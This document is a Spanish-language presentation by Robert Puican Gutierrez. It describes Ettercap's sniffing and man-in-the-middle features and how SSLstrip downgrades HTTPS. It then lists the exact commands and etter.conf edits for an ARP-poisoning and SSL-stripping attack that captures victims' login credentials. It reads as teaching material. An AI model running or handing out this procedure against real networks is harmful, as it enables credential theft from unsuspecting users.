1

2
3
ROBERT PUICAN GUTIERREZ
Ettercap
Ettercap es un interceptor/sniffer/registrador para
LANs con switch. Soporta direcciones activas y pasivas
de varios protocolos (incluso aquellos cifrados, como
SSH y HTTPS).
Tambin hace posible la inyeccin de datos en una
conexin establecida y filtrado al vuelo aun
manteniendo la conexin sincronizada gracias a su
poder para establecer un Ataque Man-in-the-
middle(Spoofing). Muchos modos de sniffing fueron
implementados para darnos un conjunto de
herramientas poderoso y completo de sniffing.
Funciones
Inyeccin de caracteres en una conexin establecida emulando
comandos o respuestas mientras la conexin est activa.
Compatibilidad con SSH1: puede interceptar users y passwords
incluso en conexiones "seguras" con SSH.
Compatibilidad con HTTPS: intercepta conexiones mediante
http SSL (supuestamente seguras) incluso si se establecen a
travs de un proxy.
Intercepta trfico remoto mediante un tnel GRE: si la conexin
se establece mediante un tnel GRE con un router Cisco, puede
interceptarla y crear un ataque "Man in the Middle".
"Man in the Middle" contra tneles PPTP (Point-to-Point
Tunneling Protocol).
Plataforma: Linux / Windows
Soporte de Plug-ins
Colector de contraseas en: Telnet, FTP, POP, Rlogin, SSH1,
ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP,
SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake3,
MSN, YMSG.
Filtrado y sustitucin de paquetes.
OS fingerprint: es decir, deteccin del sistema operativo
remoto.
Mata conexiones.
Escaneo de LAN: hosts, puertos abiertos, servicios...
Busca otros envenenamientos en la misma red.
Port Stealing (robo de puertos): es un nuevo mtodo para el
sniff en redes con switch, sin envenenamiento ARP".
Ettercap nos propone dos modos, el por defecto
(unified sniff ) o el bridged sniff, unos siendo
interactivo y el otro no.
Una vez que empieza a rastrear el trfico, obtendrs un
listado de todas las conexiones activas, junto a una
serie de atributos acerca de su estado (active, idle,
killed, etc.). El asterisco indica que una contrasea fue
recogida en esa conexin.
SSLSTRIP
La definicin de SSL Strip es variada, intentaremos acercarnos a la realidad
prctica que es lo que ms nos puede interesar.
SSL Strip consiste en hacer creer al usuario que est bajo una conexin segura,
ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puede
falsificarlo, o por que el usuario no se fija si est bajo trfico cifrado o no.
Cuando un atacante lanza SSL Strip sobre una vctima, sta sigue navegando
felizmente por la red. El problema viene cuando se conecta a una pgina bajo
HTTPS, la vctima puede observar como el HTTPS ha desaparecido de su
navegador, si no se fija en ese pequeo detalle y se autentifique en algn sitio,
sus credenciales irn en texto plano hacia la vctima.
Para que se vea lo que ocurre realmente se explica a continuacin, el recuadro
con SSL Strip es el atacante realizando un MiTM. El browser de la vctima
realizar una peticin que el atacante interceptar, entonces SSL Strip realizar
la peticin correcta al web server, y la respuesta al navegador de la vctima se
enva bajo HTTP y no bajo HTTPS. Se observa que SSL Strip aprovecha el paso
de HTTP a HTTPS para realizar sus fechoras.
SSLSTRIP
SSLSTRIP
Secuencia de Datos
Procedimiento
macchanger
echo 1 > /proc/sys/net/ipv4/ip-forward
gedit /usr/local/etc/etter.conf
ettercap Tql eth0 M arp:remote // //
iptables -t nat -A PREROUTING i eth0 -p tcp --destination-port
80 -j REDIRECT --to-ports 10000
Sslstrip a k f l 10000
Luego para iniciarlo python sslstrip.py -a -k f l 10000
Por lo que:
-a Registra todo el trfico SSL y HTTP desde el server.
-k Mata sesiones en curso.
-f Sustituye el favicon en conecciones seguras
Procedimiento
gedit /usr/local/etc/etter.conf
As luce cuando esta en su configuracin original.... debe de quedar as:
ec_uid=0
ec_gid=0
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT
--to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT
--to-port %rport"
Lo que hicimos fue des-comentar las lineas:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --
to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT
--to-port %rport"